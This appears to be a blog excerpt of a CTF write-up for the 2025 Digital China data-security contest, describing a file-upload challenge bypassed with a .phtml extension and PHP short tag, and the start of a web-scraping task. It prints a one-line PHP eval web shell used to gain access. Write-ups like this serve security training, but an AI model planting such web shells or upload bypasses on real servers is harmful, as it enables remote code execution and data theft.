GamerNoTitle

【Volcania】2025 数字中国创新大赛数据安全产业积分争夺赛初赛 Writeup

Created2025-03-30|CTF|CTF•DCIC

数据安全ez_upload | @Rusty 明显考察的是文件上传漏洞，按顺序一个个试，先上传了个txt和png、jpg，都不行，然后试试php，也不行，看来对文件后缀的过滤很严格。最后测试phtml可以实现绕过直接上传<?php发现会被拦截，经测试用短标签<?=可以绕过参考链接：https://blog.csdn.net/m0_53008479/article/details/123366077 挂马 te.phtml 12#te.phtml<?=eval($_POST['ant'])?> 蚂剑连接找到rsa文件夹 /var/www/rssss4a 模型安全数据预处理网页数据需要从原始 HTML 结构，每个商品的链接为 http://47.117.186.154:32903/index.php?controller=product&action=detail&id=<:id> id 为 1-500 的纯数字，因为有情感色彩分析，考虑用本地 ollama 先写一个数据抓取脚本， ...

Announcement

本站的所有图片文件已迁移至Cloudflare R2，除了必要的js和css，其他文件不再使用Github托管jsdelivr访问的业务逻辑
如果你也想使用Cloudflare R2，可以点击下面的链接查看如何使用
Cloudflare R2部署指北

.------.--------.---------.
| .=====================. |\
| | 7  3  5  5  6  0  8 | | |
| +=====================+ | |
|----------------------\\-. |
|    *   |      ^|^    || |\|
|   .-----------------.|| | |
|   |  1  |  2  |  3  ||| | |
|   |-----+-----+-----||| | |
|   |  4  |  5  |  6  ||| | |
|   |-----+-----+-----||| | |
|   |  7  |  8  |  9  ||| | |
|   |-----+-----+-----|// | |
|   |  *  |  0  |  #  |/  | |
|   +-----------------+   | |
|       |       |         | |
+-------+-------+---------+ |
\______\_______\_________+\/

gamernotitle@site_web > ./plant.sh

Boom has been planted.